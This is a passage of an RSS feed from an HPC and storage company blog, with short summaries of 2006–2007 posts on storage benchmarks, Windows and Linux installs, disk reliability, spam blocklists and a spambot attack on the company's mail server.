      <pubDate>Sat, 17 Mar 2007 02:52:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/the-3-day-iozone-test/</guid>
      <description>Ugh &amp;hellip; I had thought that I would be able to use VC++ to build IOzone. Well, I haven&amp;rsquo;t been successful at this. IOzone, like many other OSS codes use autoconf. Which hasn&amp;rsquo;t been ported to enable people to use VC++.
So I used Cygwin to build bonnie++ and IOzone. IOzone has been running, oh, about 3 days now, on the windows 2003 server x64 unit. With a 32GB file size, performance pretty much falls off the radar.</description>
    </item>
    
    <item>
      <title>Someone needs to take charge at Novell</title>
      <link>https://blog.scalability.org/2007/03/someone-needs-to-take-charge-at-novell/</link>
      <pubDate>Thu, 15 Mar 2007 23:05:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/someone-needs-to-take-charge-at-novell/</guid>
      <description>[shakes head in disbelief] Reported on /. and elsewhere. Way back when it was announced, Mr. Ballmer, head honcho of Microsoft demonstrated how much he p0wned Novell when he let loose with some beauties right after signing a deal with them.
Our comment at the time was
And today, we get a demonstration of how badly they were played, and continue to be played, and how clueless their marketing is. From /.</description>
    </item>
    
    <item>
      <title>RedHat EL 5 is out</title>
      <link>https://blog.scalability.org/2007/03/redhat-el-5-is-out/</link>
      <pubDate>Thu, 15 Mar 2007 19:22:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/redhat-el-5-is-out/</guid>
      <description>Old news by now. Looks like, apart from xfs, they fixed lots of things they needed to fix. They made the advanced version look very nice. With this, setting up JackRabbit Pack storage clusters should be pretty easy. We will still have to support xfs externally to them, but at least now they have some things we can use within our RAIN JackRabbit Pack storage cluster. Time to make sure it works.</description>
    </item>
    
    <item>
      <title>JackRabbits looking through Windows ...</title>
      <link>https://blog.scalability.org/2007/03/jackrabbits-looking-through-windows/</link>
      <pubDate>Thu, 15 Mar 2007 02:07:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/jackrabbits-looking-through-windows/</guid>
      <description>Summary: JackRabbit officially supports Windows 2003 Server x64. Scalable Informatics will support JackRabbits running windows. For those not in the know, JackRabbit is a very dense, power efficient, and high performance storage system. 36 TB (yes TeraByte) raw in 5 rack units (yes, this is not a typo). We regularly measure more than 1GB/s sustained to disks. It has network pipes to push out the data as well, starting with quad Gigabit ethernet, and moving up from there to Infiniband, 10GbE, and other technologies as they stabilize.</description>
    </item>
    
    <item>
      <title>Like deja vu all over again ...</title>
      <link>https://blog.scalability.org/2007/03/like-deja-vu-all-over-again/</link>
      <pubDate>Wed, 14 Mar 2007 13:40:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/like-deja-vu-all-over-again/</guid>
      <description>When I installed the original Solaris 10 bits (the 6.06 bits) on a machine, I was amazed at how incredibly confused and useless the installer was. For a supposedly powerful OS to have so completely useless an installer didn&amp;rsquo;t amuse me, it frustrated me. Keep this in mind. I am installing, or put more accurately, attempting to install, Windows 2003 x64 server.
Boots from the DVD/CD on the USB2 port. So far so good.</description>
    </item>
    
    <item>
      <title>More fast rabbits ...</title>
      <link>https://blog.scalability.org/2007/03/more-fast-rabbits/</link>
      <pubDate>Wed, 14 Mar 2007 00:27:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/more-fast-rabbits/</guid>
      <description>The rebuild finished. Rebooted, not sure why we were getting the oddities we did. On the test track. Open it up, just a little.
As I am sitting here, I am watching it spill 500-700 MB/s to disk in writes. Our test case is 2x larger than physical memory. Caching isn&amp;rsquo;t relevant for reading and writing here. Now it is switching into &amp;ldquo;Reading intelligently&amp;hellip;&amp;rdquo;. To understand why this is so interesting, here is some dstat output again.</description>
    </item>
    
    <item>
      <title>JackRabbits are fast critters</title>
      <link>https://blog.scalability.org/2007/03/jackrabbits-are-fast-critters/</link>
      <pubDate>Tue, 13 Mar 2007 04:40:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/jackrabbits-are-fast-critters/</guid>
      <description>We received our unit back from the testers. We were interested in seeing them run the unit hard and comparing it to others in similar configs. Sadly this is not what happened. Regardless, we decided to take the unit out, play with it, understand the performance little better, then take it out to the test track and crack the throttle wide open. Let it run flat out for a bit. See what it can do.</description>
    </item>
    
    <item>
      <title>Yet Another Broken RBL</title>
      <link>https://blog.scalability.org/2007/03/yet-another-broken-rbl-2/</link>
      <pubDate>Mon, 12 Mar 2007 15:05:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/yet-another-broken-rbl-2/</guid>
      <description>with the latest spam surge in progress, admins seem hell-bent on using non-functional methods to fight this. So our legitimate mails get blocked, since we are on particular ISPs. This is nuts.
Ok, I am going to lay into the RBLs here. Unless you have evidence that our IPs have been spamming, you should not try to stop mail. Evidence of spamming is, curiously enough, spam traced back to our IP addresses.</description>
    </item>
    
    <item>
      <title>quick update to 2.1.2 WP</title>
      <link>https://blog.scalability.org/2007/03/quick-update-to-212-wp/</link>
      <pubDate>Sun, 04 Mar 2007 16:16:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/quick-update-to-212-wp/</guid>
      <description>No news is good news. No issues, just precautions. This does bring up the issue of security. PHP appears to be quite exploitable. Sure, code in any language can usually be made to do things unexpected if fed unanticipated input, and the input is not correctly scrubbed.
Just as a precaution, it looks like running PHP based sites ought to be done in terms of virtual machines without write access to local storage.</description>
    </item>
    
    <item>
      <title>And the beat goes on ...</title>
      <link>https://blog.scalability.org/2007/02/and-the-beat-goes-on/</link>
      <pubDate>Thu, 01 Mar 2007 02:57:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/and-the-beat-goes-on/</guid>
      <description>Netapp makes good points in their response to the paper on average failure rates. Ignoring the intrinsic marketing in their document, the information in there is invaluable. As indicated before, PT Barnum would be pleased with the vendors of the higher priced product promising, but not delivering, higher reliability.
We had noticed this for a while: failure rates are about the same. And in this case, why would you use the more expensive product which promises lower failure rates?</description>
    </item>
    
    <item>
      <title>When you have a great deal of power, but you can&#39;t use it, because it is too hard to use it ...</title>
      <link>https://blog.scalability.org/2007/02/when-you-have-a-great-deal-of-power-but-you-cant-use-it-because-it-is-too-hard-to-use-it/</link>
      <pubDate>Sun, 25 Feb 2007 13:43:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/when-you-have-a-great-deal-of-power-but-you-cant-use-it-because-it-is-too-hard-to-use-it/</guid>
      <description>For decades, I have been debating friends and colleagues talking about high performance computing, specifically parallel computing. They doubt that parallel computing techniques will ever go &amp;ldquo;mainstream&amp;rdquo;. That is, that there will ever be a large upswing in the number of users of parallel programming techniques and methods, or for that matter codes which use parallel programming effectively. I argue that this will occur, when such usage gets to be &amp;ldquo;easy&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>FWIW</title>
      <link>https://blog.scalability.org/2007/02/fwiw/</link>
      <pubDate>Sun, 25 Feb 2007 02:06:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/fwiw/</guid>
      <description>We have been asked to do some benchmarking of CCS systems using a number of codes. I wanted us to do better ports of the codes, so that they get at least performance parity with Linux. There is lots of FUD eminating from the groups about superiority in one aspect or another, and we want to ignore that, fix the bottlenecks, and get good performance on windows.
The last time we dealt with something like this was with Solaris 10 (and to a lesser extent, OSX before that).</description>
    </item>
    
    <item>
      <title>Yuppers</title>
      <link>https://blog.scalability.org/2007/02/yuppers/</link>
      <pubDate>Sun, 25 Feb 2007 01:32:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/yuppers/</guid>
      <description>Saw this on /.. I heartily agree with the premise. The idea is put up, or, well &amp;hellip; ya know &amp;hellip;
Unfortunately, Microsoft is quite likely to ignore this. Give it no notice. Which is a shame. If they have a claim worth litigating, it is likely that they would be asked if they tried other remedies first, such as asking to have the offending code removed. Here you have a large group of people basically saying &amp;ldquo;wheres the beef &amp;hellip; er &amp;hellip; code&amp;rdquo;?</description>
    </item>
    
    <item>
      <title>Eloquent statement</title>
      <link>https://blog.scalability.org/2007/02/eloquent-statement/</link>
      <pubDate>Sat, 24 Feb 2007 02:47:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/eloquent-statement/</guid>
      <description>From today&amp;rsquo;s HPCWire.
What Professor Snir said for programming HPC also holds true for designing HPC systems and clusters. Anyone can take group of machines and &amp;ldquo;turn them into a cluster&amp;rdquo;. Heck, you can even ask your local, neighborhood MCSE to do it for you. And it may work well for some set of problems. But what happens when performance goes into the dirt on a critical code, and you don&amp;rsquo;t understand why?</description>
    </item>
    
    <item>
      <title>Sun, utility computing for HPC, and changes</title>
      <link>https://blog.scalability.org/2007/02/sun-utility-computing-for-hpc-and-changes/</link>
      <pubDate>Fri, 23 Feb 2007 20:41:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/sun-utility-computing-for-hpc-and-changes/</guid>
      <description>About a year ago, we were exploring working with Sun to resell CPU cycles with application frontend units. We were going to run Linux on their machines.
Seems Sun no longer is doing this. A customer asked us to provide dedicated cycles to them, for their app. Sun doesn&amp;rsquo;t seem to enable this anymore. Moreover, their entire &amp;ldquo;utility computing&amp;rdquo; model is based upon non-dedicated Solaris 10. This is unfortunately a non-starter.</description>
    </item>
    
    <item>
      <title>This is at least amusing ...</title>
      <link>https://blog.scalability.org/2007/02/this-is-at-least-amusing/</link>
      <pubDate>Wed, 21 Feb 2007 13:18:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/this-is-at-least-amusing/</guid>
      <description>So we had the little &amp;hellip; I dunno what to call it &amp;hellip; fiasco, mebbe? where we were promised a reasonable comparison between a JackRabbit and a Thumper, and did not get it (a reasonable out-of-box comparison, no one I know who promises accurate comparison purposefully de-tunes one platform before comparing). I am not going to dive back into that mess. When we are paid to benchmark, or when we do it on our own, we never, ever start out by ignoring the vendor/authors on what makes it slow/fast.</description>
    </item>
    
    <item>
      <title>Well I&#39;ll be darned ...</title>
      <link>https://blog.scalability.org/2007/02/well-ill-be-darned/</link>
      <pubDate>Wed, 21 Feb 2007 03:04:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/well-ill-be-darned/</guid>
      <description>More people are picking up the drive story. I expect to hear rebuttals any time now from the big expensive disk players.
FWIW: we have been talking about this for a while. Lots of our partners have observed these things. MTBF is a great way to estimate things. The model appears to be broken, as it is not 5-20% off. But 5-10x off. This is important. If you develop a theory, and it mispredicts something by a significant amount, you have, really, one option for your theory.</description>
    </item>
    
    <item>
      <title>That banging sound you hear is my head against the table</title>
      <link>https://blog.scalability.org/2007/02/that-banging-sound-you-hear-is-my-head-against-the-table/</link>
      <pubDate>Wed, 21 Feb 2007 00:46:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/that-banging-sound-you-hear-is-my-head-against-the-table/</guid>
      <description>Names not mentioned to protect the guilty. So I am working on a cluster load. Have everything nicely configured. Do some tests, make sure it takes correctly. I have spent many an hour dealing with some sort of broken process, due to minor changes in seemingly unrelated areas. Usually broken due to badly borked installers that, for better or worse (usually worse) are considered &amp;ldquo;standard.&amp;rdquo;
This is the N+1th test. We have customers who like installing and re-installing.</description>
    </item>
    
    <item>
      <title>Disk reliability: FC and SCSI vs SATA</title>
      <link>https://blog.scalability.org/2007/02/disk-reliability-fc-and-scsi-vs-sata/</link>
      <pubDate>Sat, 17 Feb 2007 00:59:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/disk-reliability-fc-and-scsi-vs-sata/</guid>
      <description>I have been pointing out for some time that disk manufacturing processes and hardware are pretty much identical across all types of disk. There is nothing of significance different between the hardware in a SCSI, FC, or SATA drive, outside the drive electronics package.
One of the side effects of this would be effectively indistinguishable failure rates between the hardware. Of course, all these vendors publish MTBF, and other numbers which are &amp;ldquo;measured&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Benchmarking a JackRabbit</title>
      <link>https://blog.scalability.org/2007/02/benchmarking-a-jackrabbit/</link>
      <pubDate>Tue, 13 Feb 2007 15:58:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/benchmarking-a-jackrabbit/</guid>
      <description>This is a modified version of a previous posting. We agreed to rewrite this post, eliding mention of a report we had taken issue with, and why we had taken issue with it. We will report JackRabbit benchmark data as we have measured it on our original system. Updated benchmark data, run files, and so on will be available from our site as soon as possible.
IOzone benchmarks were run and the results plotted.</description>
    </item>
    
    <item>
      <title>Get yer cores here, fresh hot, 80 of them ...</title>
      <link>https://blog.scalability.org/2007/02/get-yer-cores-here-fresh-hot-80-of-them/</link>
      <pubDate>Mon, 12 Feb 2007 18:18:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/get-yer-cores-here-fresh-hot-80-of-them/</guid>
      <description>Only 1.2TF performance. Ok, I am officially impressed. The immediate questions are
a) can anyone actually program it b) how hard do you have to work to feed this monster? Data motion is hard. Very hard. You have fixed sized pipes. You see contention at dual core, and quad, as Clovertown shows, is not appropriate for memory bound codes on fixed/limited width memory pipes. Regardless of those (not so minor) issues, all I can say is &amp;ldquo;wow&amp;rdquo; and good job Intel.</description>
    </item>
    
    <item>
      <title>Linux and Microsoft:  Jeremy Allison&#39;s summary of the Novell deal</title>
      <link>https://blog.scalability.org/2007/02/linux-and-microsoft-jeremy-allisons-summary-of-the-novell-deal/</link>
      <pubDate>Sun, 11 Feb 2007 18:11:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/linux-and-microsoft-jeremy-allisons-summary-of-the-novell-deal/</guid>
      <description>Saw this on /.. Jeremy&amp;rsquo;s major problem was the patent cross license.
My problem was not that. I had indicated that if this were a reasonable deal, then both companies would be talking about expanded capabilities, better interop, and all sorts of things. One company was talking that way. Novell. One company was talking about &amp;ldquo;unaccounted for balance sheet liabilities&amp;rdquo;. Also known as FUD. Specifically he articulated:
Yeah&amp;hellip; he noticed that too.</description>
    </item>
    
    <item>
      <title>The grid is dead ... long live the ... er ... grid</title>
      <link>https://blog.scalability.org/2007/02/the-grid-is-dead-long-live-the-er-grid/</link>
      <pubDate>Sat, 10 Feb 2007 17:04:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/the-grid-is-dead-long-live-the-er-grid/</guid>
      <description>I saw a post linked from Ken Farmers excellent LinuxHPC.org site. In it the author leads with a title of &amp;ldquo;Grid computing being doomed.&amp;rdquo;
Ok &amp;hellip; Reading further, it seems that the conception of what Grid computing is has morphed a bit. With the rise of the SaaS fad (long term fad, unless it can show real demonstratable ROI for everyday apps) and VC&amp;rsquo;s pouring money into this willy-nilly, it turns out that &amp;ldquo;Grid&amp;rdquo; is no longer fashionable for VCs.</description>
    </item>
    
    <item>
      <title>P=NP and other trivia</title>
      <link>https://blog.scalability.org/2007/02/pnp-and-other-trivia/</link>
      <pubDate>Thu, 08 Feb 2007 20:46:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/pnp-and-other-trivia/</guid>
      <description>Ok, well, not quite. But apparently the folks over at D-Wave have a quantum computer about to be shown solving a real problem. Talk about accelerated computing &amp;hellip;
They are somewhat flippant about pointing out that this is an NP problem solver. So if we have some little NP problem, like, I dunno, Ising models in the presence of a magnetic field, this thing ought to be able to solve it.</description>
    </item>
    
    <item>
      <title>Yet another broken RBL</title>
      <link>https://blog.scalability.org/2007/02/yet-another-broken-rbl/</link>
      <pubDate>Mon, 05 Feb 2007 18:57:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/yet-another-broken-rbl/</guid>
      <description>Yup, as if it should surprise anyone. PBL from Spamhaus.org. Somehow they decided that our mail system is not allowed to send mail.
I have grown tired of this. 3 weeks ago we defended against a huge DDoS without using a single RBL. In fact, had we used an RBL, the traffic against that server (they use DNS like records) would have been assumed to be a DDoS on our part against them.</description>
    </item>
    
    <item>
      <title>Post 202 transmogrified to post 209</title>
      <link>https://blog.scalability.org/2007/02/post-202-transmogrified-to-post-209/</link>
      <pubDate>Sat, 03 Feb 2007 05:00:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/post-202-transmogrified-to-post-209/</guid>
      <description>post removed, content edited, and put at http://www.scalability.org?p=209 . For information on JackRabbit, see http://jackrabbit.scalableinformatics.com .</description>
    </item>
    
    <item>
      <title>Business planning</title>
      <link>https://blog.scalability.org/2007/02/business-planning/</link>
      <pubDate>Fri, 02 Feb 2007 21:38:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/business-planning/</guid>
      <description>Deepak over at MNDoci links to Guy Kawasaki&amp;rsquo;s blog. I browsed through it and found this post. Basically it questions whether or not a formally constructed business plan is needed.
Ok, this is an oversimplification. The basic idea is that you need to be able to communicate your ideas concisely, to be able to convince others that the ideas have merit, and that you have more than a snowballs chance on a sunny July afternoon in Florida of actually making it work.</description>
    </item>
    
    <item>
      <title>Demoing Accelerated Computing</title>
      <link>https://blog.scalability.org/2007/02/demoing-accelerated-computing/</link>
      <pubDate>Fri, 02 Feb 2007 21:09:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/demoing-accelerated-computing/</guid>
      <description>So I flew to Eilat, demostrated how a little accelerated computing worked relative to a cluster. What really got to me was how simple a demo it was. The fingers never left the hands, and all that.
We ran a HMMer run on the cluster, then a Scalable HMMer run on the identical data set. Then we ran an 8 way cluster run using MPI-HMMer, again, running the same data and options.</description>
    </item>
    
    <item>
      <title>Jim Gray</title>
      <link>https://blog.scalability.org/2007/02/jim-gray/</link>
      <pubDate>Fri, 02 Feb 2007 03:59:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/jim-gray/</guid>
      <description>Fox News is reporting him missing at sea. He was sailing on the west coast, in the SF Bay area. I hope for the best, though things are not looking good.
Jim Gray is one of those few scientists who is a universalist, he has made contributions across a broad spectrum of research. Many scientists pick one sub-field, and hyper-specialize in that, creating esoterica with abandon. Dr. Gray&amp;rsquo;s contributions are broad based and deep, he appears able to work comfortably in many fields with many researchers.</description>
    </item>
    
    <item>
      <title>Inversion</title>
      <link>https://blog.scalability.org/2007/01/inversion/</link>
      <pubDate>Tue, 30 Jan 2007 06:53:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/inversion/</guid>
      <description>Suppose you had an opportunity to get some applications (open source and otherwise) onto CCS. Which apps would you like to see? I have my own list, but I would like to hear yours. I ask as I know most apps run great on the current mainstream clusters. You know, those myriad of Linux units.
What are your major concerns in getting apps on there? Right now there is a defined lack of apps on CCS.</description>
    </item>
    
    <item>
      <title>NIH and aimk-ing your way into insanity</title>
      <link>https://blog.scalability.org/2007/01/nih-and-aimk-ing-your-way-into-insanity/</link>
      <pubDate>Tue, 30 Jan 2007 06:34:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/nih-and-aimk-ing-your-way-into-insanity/</guid>
      <description>There is a tendency in the technical world to be enamored of ones own &amp;ldquo;stuff&amp;rdquo; to the exclusion of other &amp;ldquo;stuff&amp;rdquo;. In the sense that if you didn&amp;rsquo;t invent it, it can&amp;rsquo;t be good. Sometimes it is called NIH for &amp;ldquo;not invented here&amp;rdquo; when it pervades a larger group.
Make is one such example. Make is an incredibly powerful tool. Insanely powerful, as it is quite simple to use and work with.</description>
    </item>
    
    <item>
      <title>Commoditization in HPC</title>
      <link>https://blog.scalability.org/2007/01/commoditization-in-hpc/</link>
      <pubDate>Fri, 26 Jan 2007 05:28:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/commoditization-in-hpc/</guid>
      <description>Chris over at the excellent hpcanswers.com site wrote an article for HPCWire entitled &amp;ldquo;Innovation and Commoditization in HPC&amp;rdquo;. He makes quite a few points in there, but they have a constant theme.
The idea is to do things better than before, drive down your costs, increase the performance, and do this continuously. He sites several examples of this, and postulates others. This is a good article, though I would probably suggest refining some of the points.</description>
    </item>
    
    <item>
      <title>Congratulations to IBM on their 22TF win at OSC</title>
      <link>https://blog.scalability.org/2007/01/congratulations-to-ibm-on-their-22tf-win-at-osc/</link>
      <pubDate>Thu, 25 Jan 2007 22:01:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/congratulations-to-ibm-on-their-22tf-win-at-osc/</guid>
      <description>It seems IBM won the OSC procurement with a 22TF system. Oddly enough (really oddly enough), our bid was also 22TF in power. I would like to see the final configuration and pricing. I wonder if our bid somehow contributed to the final IBM configuration (this would be disappointing, but not terribly surprising).</description>
    </item>
    
    <item>
      <title>Grrrr</title>
      <link>https://blog.scalability.org/2007/01/grrrr/</link>
      <pubDate>Tue, 23 Jan 2007 23:47:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/grrrr/</guid>
      <description>Let me say this forcefully. Linux is not Redhat. Redhat packages Linux, as do others. They support it as do others. They contribute to it, as do others. They don&amp;rsquo;t &amp;ldquo;define&amp;rdquo; it. Thats what standards bodies are for. LSB. I keep running into all sorts of problems in getting things properly working with hardware or software that has been built around the Redhat == Linux model. Sadly, this does nothing to convince me to use more Redhat.</description>
    </item>
    
    <item>
      <title>Update on ECCB06</title>
      <link>https://blog.scalability.org/2007/01/update-on-eccb06/</link>
      <pubDate>Tue, 23 Jan 2007 23:34:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/update-on-eccb06/</guid>
      <description>Well the conference is almost over, but I can&amp;rsquo;t stay to the end. Lots of very interesting talks and posters. Met a few people I had spoken to in the past. The demo (e.g. from &amp;ldquo;We Say So&amp;rdquo;) a few days ago. I wound up not using the VMware instance. There were simply too many headaches in possibly using it (logistical). It is a shame. I will develop the more fully, so it is ready next time.</description>
    </item>
    
    <item>
      <title>Sadness</title>
      <link>https://blog.scalability.org/2007/01/sadness/</link>
      <pubDate>Mon, 22 Jan 2007 20:02:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/sadness/</guid>
      <description>I just read this on the Detroit Free Press after seeing it on Drudge. Ok. I have friends and acquaintances who work there. Just like my friends at Ford. Of whom, many will likely be on the receiving end of a job-ax. So what is state to do?
A number of things. First: There is a whole heck-of-a-lot-a talent in Michigan. Huge amounts. Maybe, somehow, someway, if we could, I dunno, stop subsidizing failing industries and focus on, I don&amp;rsquo;t know, microcapitalizing small startup ideas here &amp;hellip; Sort of like a MLSC but done right.</description>
    </item>
    
    <item>
      <title>Pictures for a portion of day 1</title>
      <link>https://blog.scalability.org/2007/01/pictures-for-a-portion-of-day-1/</link>
      <pubDate>Sun, 21 Jan 2007 12:21:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/pictures-for-a-portion-of-day-1/</guid>
      <description>Are up here. It is very nice here. Using Google Earth it wasn&amp;rsquo;t too hard to figure out where it was. Download this KML and load it into Google Earth.</description>
    </item>
    
    <item>
      <title>At ECCB06 in Eilat</title>
      <link>https://blog.scalability.org/2007/01/at-eccb06-in-eilat/</link>
      <pubDate>Sun, 21 Jan 2007 00:39:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/at-eccb06-in-eilat/</guid>
      <description>ECCB06 is starting tomorrow in Eilat. The story of this travel is full of sound and fury. And time. Lots and lots of time. Waiting. And things breaking. Or not working. And did I mention time?
I am presenting accelerated informatics demos for AMD at 10:30am monday morning. Should be lots of fun. Ok, being a good little presenter type, I gathered up everything I needed and got it into my carry-on bags for the trip.</description>
    </item>
    
    <item>
      <title>Some amazingly bad web sites</title>
      <link>https://blog.scalability.org/2007/01/some-amazingly-bad-web-sites/</link>
      <pubDate>Wed, 17 Jan 2007 18:06:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/some-amazingly-bad-web-sites/</guid>
      <description>No, not a Not-Safe-For-Work variety. I just visited a web site which is used in potential customers purchase processes. They have links on this site.
Someone decided that it would be a &amp;ldquo;Good-Thing&amp;rdquo;(TM) if they set up these links to launch not one, but 2, yessirree, 2 modal dialog boxes on mouseover events. Yup. Roll over the link, and these two pop right up &amp;hellip; &amp;hellip; and &amp;hellip; you &amp;hellip; cannot &amp;hellip; use &amp;hellip; the &amp;hellip; browser &amp;hellip; until &amp;hellip; you &amp;hellip; click &amp;hellip; them &amp;hellip; which would be just moderately annoying (and a funny but bad design) if it wasn&amp;rsquo;t for the fact that your mouse is in the middle of a forest of links there.</description>
    </item>
    
    <item>
      <title>&#34;We Say So&#34; corporation</title>
      <link>https://blog.scalability.org/2007/01/we-say-so-corporation/</link>
      <pubDate>Mon, 15 Jan 2007 03:40:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/we-say-so-corporation/</guid>
      <description>I used to watch a rather funny show on ABC TV named &amp;ldquo;Dinosaurs&amp;rdquo; about your typical Jurassic period nuclear family, with large dinosaurs having similar problems to modern day humans. It was quite funny. The father dinosaur worked for &amp;ldquo;We Say So&amp;rdquo; corporation. Should give you an idea of what they did, and how they did it. You didn&amp;rsquo;t have a choice. You had to do what they wanted. The following is a bit of venting.</description>
    </item>
    
    <item>
      <title>The cost of monoculture part 2</title>
      <link>https://blog.scalability.org/2007/01/the-cost-of-monoculture-part-2/</link>
      <pubDate>Sun, 14 Jan 2007 17:36:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/the-cost-of-monoculture-part-2/</guid>
      <description>Some customers have binding agreements with specific (pick your favorite TLA) vendors and insist upon buying from only them. They somehow believe they are getting a discount. It is worked into the price. They somehow believe that this saves them money.
It doesn&amp;rsquo;t. It reduces competition for their business. It increases their costs when the technological fit just isn&amp;rsquo;t there, yet they try to force the issue. So how does decreasing competition and efficiency increase savings?</description>
    </item>
    
    <item>
      <title>DDoS jujitsu, or using the DDoSers mass against them</title>
      <link>https://blog.scalability.org/2007/01/ddos-jujitsu-or-using-the-ddosers-mass-against-them/</link>
      <pubDate>Sun, 14 Jan 2007 15:01:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/ddos-jujitsu-or-using-the-ddosers-mass-against-them/</guid>
      <description>We have been under a DDoS with spambots sending us a few messages per day. Something north of 100k messages per day. I am not concerned about our infrastructure, it was holding up fine. I was more concerned about components that we didn&amp;rsquo;t have control over, or had no part in designing or building. This begged the question: is there nothing that one can do to defend against a DDoS (email spambot) attack?</description>
    </item>
    
    <item>
      <title>The configuration strikes back ...</title>
      <link>https://blog.scalability.org/2007/01/the-configuration-strikes-back/</link>
      <pubDate>Sat, 13 Jan 2007 20:05:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/the-configuration-strikes-back/</guid>
      <description>The bot attack continues for a third day. We are rejecting, on average, one email per second. At this rate, we will have rejected 31.5 million emails over the course of 1 year. I wonder if the attackers think that DDoS is a good thing, or something valid to do to other net-denizens. Sad.</description>
    </item>
    
    <item>
      <title>When bots attack</title>
      <link>https://blog.scalability.org/2007/01/when-bots-attack/</link>
      <pubDate>Fri, 12 Jan 2007 20:43:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/when-bots-attack/</guid>
      <description>We must be famous. We are being distributed bot-attacked by someone/thing. They are trying to knock over our mail system. Some of the bad IPs are here: 67.90.119.98, 195.50.165.22, and 12.154.55.44. Lots of others. For laughs:
whois 12.154.55.44 [Querying whois.arin.net] [whois.arin.net] AT&amp;amp;T; WorldNet Services ATT (NET-12-0-0-0-1) 12.0.0.0 - 12.255.255.255 ATT MIS IP-WCS OPERATIONS CTRS ATT-MIS-44-55 (NET-12-154-55-0-1) 12.154.55.0 - 12.154.55.255 # ARIN WHOIS database, last updated 2007-01-11 19:10 # Enter ? for additional hints on searching ARIN&#39;s WHOIS database.</description>
    </item>
    
    <item>
      <title>Phase transitions</title>
      <link>https://blog.scalability.org/2007/01/phase-transitions/</link>
      <pubDate>Wed, 03 Jan 2007 20:47:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/phase-transitions/</guid>
      <description>Usually start with a few small nucleation sites. Create enough of a net savings in energy, and entropy, and whammo, you are starting the rapid, highly nonlinear, often discontinuous traversal of the phase coordinate. Of such things, revolutions are born within computing. It is happening with APUs, it has happened with dual core, and it appears more likely to be happening outside of HPC. Update: R.L. Polk is not that far from us.</description>
    </item>
    
    <item>
      <title>Disruptive market changes</title>
      <link>https://blog.scalability.org/2007/01/disruptive-market-changes/</link>
      <pubDate>Wed, 03 Jan 2007 20:33:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/disruptive-market-changes/</guid>
      <description>Sharad Sharma at Orbit Change responded to my criticism with a note of his own. He clarified his context.
Quoting him, his original thesis is
Fair enough, needs drive innovation. The &amp;ldquo;must have&amp;rdquo; phenomenon. Build something that remarkably alters the economics to be strongly positive for customers to acquire and use over their existing technologies, or reduce their pain points so that they can save lots of money due to the secondary effects of workload reduction/automation.</description>
    </item>
    
    <item>
      <title>Get your MPI-HMMer while its hot ...</title>
      <link>https://blog.scalability.org/2007/01/get-your-mpi-hmmer-while-its-hot/</link>
      <pubDate>Wed, 03 Jan 2007 05:03:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/get-your-mpi-hmmer-while-its-hot/</guid>
      <description>Short version: MPI-HMMer has been released. See this link for details, and if you want RPMs, go here.</description>
    </item>
    
    <item>
      <title>So many (mis)interpretations</title>
      <link>https://blog.scalability.org/2007/01/so-many-misinterpretations/</link>
      <pubDate>Tue, 02 Jan 2007 15:30:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/so-many-misinterpretations/</guid>
      <description>Often times, things we say or write about are taken slightly (or massively) out of context, repackaged, and written or spoken about in a different manner that subsumes the original context or intent. Even well meaning people do this. It is all part of the process of forming an opinion, specifically an interpretation of events or speech. One might construe a specific person wrote something they did not.
Where am I going with this?</description>
    </item>
    
    <item>
      <title>The (black) art of prediction</title>
      <link>https://blog.scalability.org/2006/12/the-black-art-of-prediction/</link>
      <pubDate>Sun, 31 Dec 2006 15:30:49 +0000</pubDate>
      
